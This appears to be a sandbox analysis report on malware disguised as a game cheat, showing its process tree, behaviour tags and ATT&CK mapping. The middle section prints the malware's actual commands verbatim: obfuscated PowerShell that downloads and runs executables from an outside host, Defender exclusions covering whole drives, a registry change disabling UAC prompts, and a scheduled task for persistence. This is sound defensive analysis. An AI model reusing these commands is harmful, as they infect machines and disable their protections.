- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:5572
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:5328
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:2980
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:4588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1288
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1992

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2880

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3312

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3384
- C:\Users\Admin\AppData\Local\Temp\LUKZI CHEAT 3 DAY.exe
  "C:\Users\Admin\AppData\Local\Temp\LUKZI CHEAT 3 DAY.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3460
- - C:\Users\Admin\LUKZI CHEAT 3 DAY.exe
    "C:\Users\Admin\LUKZI CHEAT 3 DAY.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Users\Admin\LUKZI CHEAT 3 DAY.exe
      "C:\Users\Admin\LUKZI CHEAT 3 DAY.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Anti Crash.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:796
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4720
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
        5⤵
        UAC bypass
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2244
    - - C:\ProgramData\FMyUS.eXe
        
        "C:\ProgramData\FMyUS.eXe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5036
      - C:\Users\Admin\AppData\Local\Temp\VjTDlRoV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VjTDlRoV.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
    - - C:\ProgramData\svOrbEl0.exe
        
        "C:\ProgramData\svOrbEl0.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3000
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3032
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:436
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3856
    - - C:\ProgramData\1ZRs6.EXe
        
        "C:\ProgramData\1ZRs6.EXe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol | find ":\"
      4⤵
      PID:2628
    - - C:\Windows\system32\mountvol.exe
        
        mountvol
        5⤵
        
        PID:664
    - - C:\Windows\system32\find.exe
        
        find ":\"
        5⤵
        
        PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c add-mppreference -exclusionpath C:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c add-mppreference -exclusionpath F:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c add-mppreference -exclusionpath D:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += '3';$url += 'b';$url += 'f';$url += 'w';$url += 's';$url += 'd';$url += '.';$url += 'G';$url += 'P';$url += '7';$url += 'B';$url += 'f';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious use of AdjustPrivilegeToken
      PID:4844
    - - C:\Users\Public\winglog32.exe
        
        "C:\Users\Public\winglog32.exe"
        5⤵
        Executes dropped EXE
        
        PID:3460
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:5864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3528

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3704

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2596

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1544

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4396

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:216

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1268

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:1360

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2688

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3552

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe b27b66a349ff3a906b8e11d6662158ad 6UzBeA5i3kmustpI9tJdzg.0.1.0.0.0
1⤵
PID:3840
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2160

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2028

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:6080

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2856 -s 1920
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6048

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery